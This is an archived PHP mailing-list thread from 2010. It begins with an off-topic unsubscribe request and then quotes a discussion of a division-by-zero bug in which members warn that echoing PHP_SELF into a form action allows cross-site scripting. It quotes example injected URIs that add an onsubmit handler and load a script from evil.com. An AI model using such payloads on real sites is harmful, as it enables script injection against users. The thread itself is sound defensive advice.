RE: Division by 0

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



I have tried and tried, countless times to be removed from this list...
still when I go to my deleted items I can see that emails leak through.
If there is an administrator who can simply delete me ( simply because I
can not seem to do this correctly) I would greatly appreciate it. Thank
You!





 Sincerely,

 Michael Roberts
Executive Recruiter
 Corporate Staffing Services
 150 Monument Road, Suite 510
 Bala Cynwyd, PA 19004
 P 610-771-1084
 F 610-771-0390
 E mroberts@xxxxxxxxxxx
Check out my recent feature article in Professional Surveyor 12/09
edition. 
http://www.profsurv.com/magazine/article.aspx?i=70379






-----Original Message-----
From: Gary [mailto:gwpaul@xxxxxxx] 
Sent: Thursday, March 11, 2010 7:51 AM
To: php-general@xxxxxxxxxxxxx
Subject: Re:  Division by 0

I love this place, thank you to everyone that posted, I will make
changes to 
make it safer.

Thanks again to everyone.

gary


"Jochem Maas" <jochem@xxxxxxxxxxxxx> wrote in message 
news:4B98DE7E.8020506@xxxxxxxxxxxxxxxx
> Op 3/10/10 11:39 PM, Daniel Egeberg schreef:
>> On Wed, Mar 10, 2010 at 23:44, Dmitry Ruban <dmitry@xxxxxxxxx> wrote:
>>> Hi Jochem,
>>>
>>> Jochem Maas wrote:
>>>>
>>>> Op 3/10/10 6:23 PM, Joseph Thayne schreef:
>>>>>
>>>>> Looks to me like you are closing your form before you put anything
in
>>>>> it.  Therefore, the loan_amount is not set making the value 0.
Follow
>>>>> the math, and you are dividing by 1-1.
>>>>>
>>>>> Change this line:
>>>>>
>>>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" 
>>>>> method="post"></form>
>>>>>
>>>>> to:
>>>>>
>>>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
>>>>
>>>> this is a XSS waiting to happen. I can put something like the
following 
>>>> in
>>>> the request uri:
>>>>
>>>> index.php?" onsubmit="evil()"><script
>>>> src="http://www.evil.com/evi.js";></script>
>>>>
>>> Apparently it's not going to work. PHP_SELF does not include query 
>>> string.
>>> So it is safe to use it this way.
>>>
>>> Regards,
>>> Dmitry
>>
>> No, it is not safe...
>>
>> This won't work:
>>   index.php?" onsubmit="evil()"><script
>> src="http://www.evil.com/evi.js";></script>
>>
>> But this will:
>>   index.php/" onsubmit="evil()"><script
>> src="http://www.evil.com/evi.js";></script>
>
> yeah sorry, I was lax and made the query string mistake,
> the issue stands though as Daniel pointed out.
>
>
>
>>
>
>
> __________ Information from ESET Smart Security, version of virus 
> signature database 4933 (20100310) __________
>
> The message was checked by ESET Smart Security.
>
> http://www.eset.com
>
>
> 



__________ Information from ESET Smart Security, version of virus
signature database 4933 (20100310) __________

The message was checked by ESET Smart Security.

http://www.eset.com





-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



[Index of Archives]     [PHP Home]     [Apache Users]     [PHP on Windows]     [Kernel Newbies]     [PHP Install]     [PHP Classes]     [Pear]     [Postgresql]     [Postgresql PHP]     [PHP on Windows]     [PHP Database Programming]     [PHP SOAP]

  Powered by Linux